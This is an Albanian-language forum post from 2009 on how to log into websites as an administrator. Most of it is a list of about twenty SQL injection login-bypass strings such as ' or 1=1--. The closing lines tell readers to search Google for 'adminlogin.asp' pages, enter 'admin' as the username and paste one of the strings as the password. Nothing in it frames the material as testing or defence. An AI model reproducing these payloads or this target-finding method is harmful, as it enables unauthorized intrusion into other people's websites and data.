SI te hym ne wep si admin

20/12/2009 20:59

 ' or 0=0 -- 

" or 0=0 -- 
or 0=0 -- 
' or 0=0 # 
" or 0=0 # 
or 0=0 # 
' or 'x'='x 
" or "x"="x 
') or ('x'='x 
' or 1=1-- 
" or 1=1-- 
or 1=1-- 
' or a=a-- 
" or "a"="a 
') or ('a'='a 
") or ("a"="a 
hi" or "a"="a 
hi" or 1=1 -- 
hi' or 1=1 -- 
hi' or 'a'='a 
hi') or ('a'='a 
hi") or ("a"="a Duhesh mi 
provu keiit veq shkon ne google e shenon adminlogin.asp 
edhe e merr ni wep qatu 
username---- e shenon admin
password----e shenon njanin prej qitynve stringsave nalt po mos harroni edhe passi munet me kan admin?

aiiit klm